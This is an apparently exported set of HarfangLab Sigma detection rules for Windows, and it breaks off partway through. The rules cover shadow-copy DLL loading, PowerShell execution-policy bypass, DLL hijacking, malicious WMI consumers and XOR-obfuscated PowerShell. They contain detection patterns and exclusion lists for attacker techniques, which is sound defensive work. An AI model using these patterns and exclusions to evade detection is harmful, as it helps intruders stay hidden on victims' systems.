"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086932Z",
"creation_date": "2026-03-23T11:45:34.086935Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086942Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_vss_com_loaded_unsigned_process.yml",
"content": "title: VSS COM Object DLL Loaded by Unsigned Process\nid: 784b1d19-3290-4508-abce-87295ed4de1a\ndescription: |\n Detects when the VSS COM Object DLL (vss_ps.dll) is loaded by an unsigned process.\n This could be the sign of a possible attempt by an attacker to delete Volume Shadow Copies.\n Volume Shadow Copies (VSS) are partial copy-on-write clones of the filesystem that can be used as restoration points when a system is corrupted or encrypted by a ransomware.\n It is recommended to analyze the process loading the DLL and to look for signs of ransomware-related activities on the host.\nreferences:\n - https://attack.mitre.org/techniques/T1490/\ndate: 2021/08/03\nmodified: 2025/11/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.VolumeShadowCopy\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n OriginalFileName: 'VSS_PS.DLL'\n Signed: 'true'\n\n exclusion_process_signed:\n ProcessSigned: 'true'\n\n exclusion_error:\n # if we cannot read info about the file, imphash will be full of 0\n ProcessImphash: '00000000000000000000000000000000'\n ProcessSize: -1\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Windows\\System32\\vssadmin.exe'\n - '?:\\Windows\\System32\\SrTasks.exe'\n - '?:\\Windows\\System32\\diskshadow.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\Windows\\System32\\dllhost.exe'\n - '?:\\NTNX\\ERA_BASE\\era_engine\\stack\\windows\\vss\\vss-agent\\EraVssHwProvider.exe'\n - '?:\\NTNX\\ERA_BASE\\era_engine\\stack\\windows\\vss\\vss-agent\\era_vss_requestor.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_dfir_orc:\n ProcessDescription: 'DFIR-ORC Utility'\n ProcessOriginalFileName: 'DFIR-ORC'\n\n exclusion_searchindexer:\n ProcessImage: '?:\\Windows\\System32\\SearchIndexer.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_werfault:\n ProcessImage: '?:\\Windows\\System32\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n exclusion_srtasks1:\n ProcessImage: '?:\\Windows\\System32\\SrTasks.exe'\n ProcessDescription: 'Microsoft® Windows System Protection background tasks.'\n ProcessOriginalFileName: 'srtasks.exe'\n exclusion_srtasks2:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\srtasks.exe ExecuteScheduledSPPCreation'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n # System Restore Restore Operation Library\n exclusion_srrstr:\n ProcessImage: '?:\\Windows\\System32\\rundll32.exe'\n ProcessCommandLine: '?:\\windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n\n exclusion_cobian:\n ProcessImage|endswith:\n - '\\Cobian Backup 1?\\cbVSCService1?.exe'\n - '\\Cobian Backup ??\\cbVSCService.exe'\n - '\\CobianBackup\\cbVSCService1?.exe'\n - '\\CobianBackup\\cbVSCService.exe'\n\n exclusion_vssvc:\n ProcessImage: '?:\\Windows\\System32\\VSSVC.exe'\n\n exclusion_forensit:\n ProcessParentImage: '?:\\ProgramData\\ForensiT\\Transwiz\\Deployment Files\\Transwiz.exe'\n ProcessImage: '?:\\Windows\\System32\\profhlp.exe'\n\n exclusion_dismhost:\n ProcessImage:\n # C:\\$WinREAgent\\Scratch\\7DB77FBA-2B90-4075-9F39-1861805CCDF9\\DismHost.exe\n - '?:\\\\?WinREAgent\\Scratch\\\\????????-????-????-????-????????????\\DismHost.exe'\n # C:\\$WINDOWS.~BT\\Work\\5F70CACE-38E3-45F7-A063-2BA837DE87EF\\DismHost.exe\n - '?:\\\\?WINDOWS.?BT\\Work\\\\????????-????-????-????-????????????\\DismHost.exe'\n\n exclusion_office2016_install:\n ProcessDescription: 'Microsoft Setup Bootstrapper'\n ProcessOriginalFileName: 'setup.exe'\n ProcessProduct: 'Microsoft Setup Bootstrapper'\n ProcessCompany: 'Microsoft Corporation'\n\n exclusion_ms_iaasbcdrextension:\n ProcessInternalName: 'IaaSBcdrExtension.exe'\n ProcessProduct: 'Microsoft® Azure Backup'\n ProcessDescription: 'IaaSBcdrExtension'\n\n exclusion_profhlp:\n ProcessImage: '?:\\Windows\\System32\\profhlp.exe'\n ProcessDescription: 'User Profile Migration Helper'\n ProcessCompany: 'ForensiT'\n\n exclusion_veeam_guesthelper:\n ProcessImage: '?:\\windows\\VeeamVssSupport\\VeeamGuestHelper.exe'\n ProcessCompany: 'Veeam Software Group GmbH'\n\n exclusion_veeam_archiver_proxy:\n ProcessOriginalFileName: 'Veeam.Archiver.Proxy.exe'\n ProcessDescription: 'Veeam.Archiver.Proxy'\n ProcessCompany: 'Veeam Software Group GmbH'\n\n exclusion_oracle:\n # E:\\oracle\\product\\11.2.0\\dbhome_1\\BIN\\oravssw.exe\n # E:\\oracle\\product\\12.2.0\\db\\bin\\oravssw.exe\n # E:\\PRODUCT\\19.3\\db_home\\bin\\oravssw.ex\n # E:\\Oracle\\bin\\oravssw.exe\n # ...\n ProcessImage: '*\\bin\\oravssw.exe'\n\n exclusion_unsigned_rundll32_win7:\n ProcessSha256: '3fa4912eb43fc304652d7b01f118589259861e2d628fa7c86193e54d5f987670'\n\n exclusion_dismplusplus:\n - ProcessOriginalFileName: 'Dism++.exe'\n ProcessImage|endswith: '\\Dism++*.exe'\n - ProcessImage|endswith: '\\Dism++\\Dism++x64.exe'\n\n exclusion_aregiev:\n ProcessImage:\n - '?:\\ProgramData\\Aregiev??\\VSS\\VSS Aregiev??.exe'\n - '?:\\ProgramData\\AvenioV??\\VSS\\VSS AvenioV??.exe'\n\n exclusion_unitrends:\n ProcessImage: '*\\WBPS.exe'\n ProcessCompany: 'Unitrends Corporation'\n\n exclusion_vss4dserver:\n ProcessImage: '?:\\ProgramData\\4D Server\\VSS\\VSS 4D Server.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_vssressource:\n ProcessImage: '?:\\ProgramData\\Ressource\\VSS\\VSS Ressource.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_rubrik:\n ProcessCommandLine: '?:\\Users\\\\*\\AppData\\Local\\Temp\\rubrik_vmware*\\snaptool.exe -Snapshot'\n\n exclusion_tiworker:\n ProcessCommandLine:\n - '?:\\Windows\\winsxs\\x86_microsoft-windows-servicingstack*\\TiWorker.exe -Embedding'\n - '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack*\\TiWorker.exe -Embedding'\n\n exclusion_nedap:\n ProcessOriginalFileName: 'LibTagManager.exe'\n ProcessDescription: 'LibTagManager'\n\n exclusion_regparser:\n ProcessImage: '?:\\\\*\\regparser_cpp\\x64\\release\\regparser_cpp.exe'\n\n exclusion_npbackup:\n ProcessImage|endswith: '\\npbackup\\restic.exe'\n ProcessParentImage|endswith:\n - '\\NPBACKUP\\npbackup-cli.exe'\n - '\\NPBackup\\npbackup-gui\\npbackup-gui.exe'\n\n exclusion_fdj:\n ProcessOriginalFileName: 'FDJ.exe'\n ProcessProduct:\n - 'FDJ'\n - 'Middleware BYG Informatique'\n\n exclusion_irisdb:\n ProcessOriginalFileName:\n - 'irisdb.exe'\n - 'cache.exe'\n ProcessDescription:\n - 'InterSystems IRIS Kernel'\n - \"Cache' Kernel\"\n\n exclusion_sv:\n ProcessImage:\n - '?:\\ProgramData\\SV??\\VSS\\VSS SV??.exe'\n - '?:\\ProgramData\\Ajaris\\VSS\\VSS ajaris.exe'\n - '?:\\ProgramData\\eo\\VSS\\VSS eo.exe'\n\n exclusion_hdclone:\n ProcessOriginalFileName: 'svc.win64.service.srv'\n ProcessDescription|contains: 'VSS proxy'\n\n exclusion_samlab:\n ProcessOriginalFileName: 'SDI_?.??.?.exe'\n ProcessProduct: 'Snappy Driver Installer'\n ProcessCompany: 'www.SamLab.ws'\n\n exclusion_migwiz:\n ProcessOriginalFileName: 'migwiz.exe'\n ProcessDescription: 'Windows Easy Transfer Application'\n ProcessCompany: 'Microsoft Corporation'\n\n exclusion_wmiprvse:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding'\n\n exclusion_kentica:\n ProcessImage: '?:\\ProgramData\\KentikaServer\\VSS\\VSS KentikaServer.exe'\n\n exclusion_restic:\n ProcessImage|endswith: '\\restic.exe'\n ProcessCommandLine|contains: 'restic.exe backup -r '\n\n exclusion_clbackup:\n ProcessImage|endswith: '\\CLBackup.exe'\n ProcessOriginalFileName: 'clBackup.exe'\n ProcessCompany: 'Commvault'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "784b1d19-3290-4508-abce-87295ed4de1a",
"rule_name": "VSS COM Object DLL Loaded by Unsigned Process",
"rule_description": "Detects when the VSS COM Object DLL (vss_ps.dll) is loaded by an unsigned process.\nThis could be the sign of a possible attempt by an attacker to delete Volume Shadow Copies.\nVolume Shadow Copies (VSS) are partial copy-on-write clones of the filesystem that can be used as restoration points when a system is corrupted or encrypted by a ransomware.\nIt is recommended to analyze the process loading the DLL and to look for signs of ransomware-related activities on the host.\n",
"rule_creation_date": "2021-08-03",
"rule_modified_date": "2025-11-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "785695ea-ccf6-4b41-914c-1f0522b2cd71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079158Z",
"creation_date": "2026-03-23T11:45:34.079160Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079164Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1"
],
"name": "t1562_001_powershell_restriction_removed.yml",
"content": "title: PowerShell Execution Policy Changed\nid: 785695ea-ccf6-4b41-914c-1f0522b2cd71\ndescription: |\n Detects PowerShell execution policy being changed to Bypass or Unrestricted globally, in the Windows registry.\n Attackers may want to alter the PowerShell execution policy to simplify the execution of malicious or unsigned scripts.\n It is recommended to analyze the process reponsible for the registry edit to look for malicious content or actions.\n It is also recommended to look for the subsequent execution of suspicious PowerShell scripts.\nreferences:\n - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1\ndate: 2020/11/23\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft\\.PowerShell\\ExecutionPolicy'\n Details:\n - 'Bypass'\n - 'Unrestricted'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "785695ea-ccf6-4b41-914c-1f0522b2cd71",
"rule_name": "PowerShell Execution Policy Changed",
"rule_description": "Detects PowerShell execution policy being changed to Bypass or Unrestricted globally, in the Windows registry.\nAttackers may want to alter the PowerShell execution policy to simplify the execution of malicious or unsigned scripts.\nIt is recommended to analyze the process reponsible for the registry edit to look for malicious content or actions.\nIt is also recommended to look for the subsequent execution of suspicious PowerShell scripts.\n",
"rule_creation_date": "2020-11-23",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7868bb44-021b-4507-b436-948eee128c21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589536Z",
"creation_date": "2026-03-23T11:45:34.589539Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589546Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/dez_/status/1547612120094650374",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nativemessagingclient.yml",
"content": "title: DLL Hijacking via Microsoft.SharePoint.NativeMessagingClient.exe\nid: 7868bb44-021b-4507-b436-948eee128c21\ndescription: |\n Detects potential Windows DLL Hijacking via Microsoft.SharePoint.NativeMessagingClient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/dez_/status/1547612120094650374\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/19\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Microsoft.SharePoint.NativeMessaging.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\Secur32.dll'\n - '\\VERSION.dll'\n - '\\WININET.dll'\n - '\\WTSAPI32.dll'\n - '\\USERENV.dll'\n - '\\SSPICLI.DLL'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7868bb44-021b-4507-b436-948eee128c21",
"rule_name": "DLL Hijacking via Microsoft.SharePoint.NativeMessagingClient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Microsoft.SharePoint.NativeMessagingClient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-19",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "789591b5-b238-4ee1-8c07-581219e9f298",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589832Z",
"creation_date": "2026-03-23T11:45:34.589836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589844Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_reagentc.yml",
"content": "title: DLL Hijacking via reagentc.exe\nid: 789591b5-b238-4ee1-8c07-581219e9f298\ndescription: |\n Detects potential Windows DLL Hijacking via reagentc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'reagentc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\dbghelp.dll'\n - '\\ReAgent.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "789591b5-b238-4ee1-8c07-581219e9f298",
"rule_name": "DLL Hijacking via reagentc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via reagentc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "78dba5b0-1ea3-47fc-a4f4-ccc24ba63a84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076391Z",
"creation_date": "2026-03-23T11:45:34.076393Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076398Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
"https://attack.mitre.org/techniques/T1546/003/"
],
"name": "t1546_003_wmi_suspicious_consumer.yml",
"content": "title: Suspicious WMI Consumer\nid: 78dba5b0-1ea3-47fc-a4f4-ccc24ba63a84\ndescription: |\n Detects the creation of suspicious WMI consumer used to execute malicious actions on a specific trigger.\n Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\n WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\n By default, two consumers classes can be used maliciously:\n - Script: execute the specified code or related script.\n - Command-line: execute the specified command-line.\n\n It is recommended to investigate this action to determine its legitimacy, you may use the Get-WmiObject PowerShell cmdlet and investigate any suspicious objects.\nreferences:\n - https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html\n - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\n - https://attack.mitre.org/techniques/T1546/003/\ndate: 2023/12/07\nmodified: 2025/06/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.003\n - classification.Windows.Source.WmiEvent\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: wmi_event\ndetection:\n selection:\n EventID: 20\n Type:\n - Script\n - Command Line\n Operation:\n - Created\n - Modified\n\n exclusion_hp:\n - Name:\n - HP USB-C Dock G5 Consumer\n - HP Thunderbolt Dock G4 Consumer\n - HP USB-C&A Universal Dock G2 Consumer\n - HP Thunderbolt Dock G2 Consumer\n - Destination: '?:\\Program Files\\HP\\HP Firmware Installer\\\\*\\HPFirmwareInstaller.exe'\n exclusion_dell:\n Name:\n - DellCommandPowerManagerPolicyChangeEventConsumer\n - DellCommandPowerManagerAlertEventConsumer\n exclusion_default:\n Name: 'BVTConsumer'\n Destination: 'cscript KernCap.vbs'\n exclusion_tenablead:\n Name: 'AlsidForAD-Launcher'\n Destination|contains: 'IOA\\Register-TenableADEventsListener.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "78dba5b0-1ea3-47fc-a4f4-ccc24ba63a84",
"rule_name": "Suspicious WMI Consumer",
"rule_description": "Detects the creation of suspicious WMI consumer used to execute malicious actions on a specific trigger.\nAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\nBy default, two consumers classes can be used maliciously:\n - Script: execute the specified code or related script.\n - Command-line: execute the specified command-line.\n\nIt is recommended to investigate this action to determine its legitimacy, you may use the Get-WmiObject PowerShell cmdlet and investigate any suspicious objects.\n",
"rule_creation_date": "2023-12-07",
"rule_modified_date": "2025-06-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "78e4265f-a2b1-4c20-abe1-dccac19c20b6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608211Z",
"creation_date": "2026-03-23T11:45:34.608214Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608222Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/yellow-cockatoo/",
"https://redcanary.com/threat-detection-report/techniques/powershell/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1027/"
],
"name": "t1059_001_powershell_xor_obfuscation_cmd.yml",
"content": "title: PowerShell XOR Obfuscation in Command-line\nid: 78e4265f-a2b1-4c20-abe1-dccac19c20b6\ndescription: |\n Detects the use of XOR encoding in powershell.exe's command-line.\n Attackers can used this technique to obfuscate its command-line to evade defenses.\n It is recommended to de-obfuscate the command-line, to analyze it and to look for malicious content or actions stemming from the PowerShell process.\nreferences:\n - https://redcanary.com/blog/yellow-cockatoo/\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/\ndate: 2021/06/24\nmodified: 2025/04/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1027\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_image:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_commandline:\n CommandLine|contains:\n # all possible permutations of ' -bxor ' (base64, utf16le, mixedcase)\n - ' -bxor '\n - 'IAAtAGIAeABPAHIAIA'\n - 'AALQBiAHgATwByACAA'\n - 'gAC0AYgB4AE8AcgAgA'\n - 'IAAtAGIAWABvAFIAIA'\n - 'AALQBiAFgAbwBSACAA'\n - 'gAC0AYgBYAG8AUgAgA'\n - 'IAAtAEIAeABPAHIAIA'\n - 'AALQBCAHgATwByACAA'\n - 'gAC0AQgB4AE8AcgAgA'\n - 'IAAtAEIAWABvAFIAIA'\n - 'AALQBCAFgAbwBSACAA'\n - 'gAC0AQgBYAG8AUgAgA'\n - 'IAAtAEIAeABvAFIAIA'\n - 'AALQBCAHgAbwBSACAA'\n - 'gAC0AQgB4AG8AUgAgA'\n - 'IAAtAEIAeABPAFIAIA'\n - 'AALQBCAHgATwBSACAA'\n - 'gAC0AQgB4AE8AUgAgA'\n - 'IAAtAEIAWABPAFIAIA'\n - 'AALQBCAFgATwBSACAA'\n - 'gAC0AQgBYAE8AUgAgA'\n - 'IAAtAGIAWABPAFIAIA'\n - 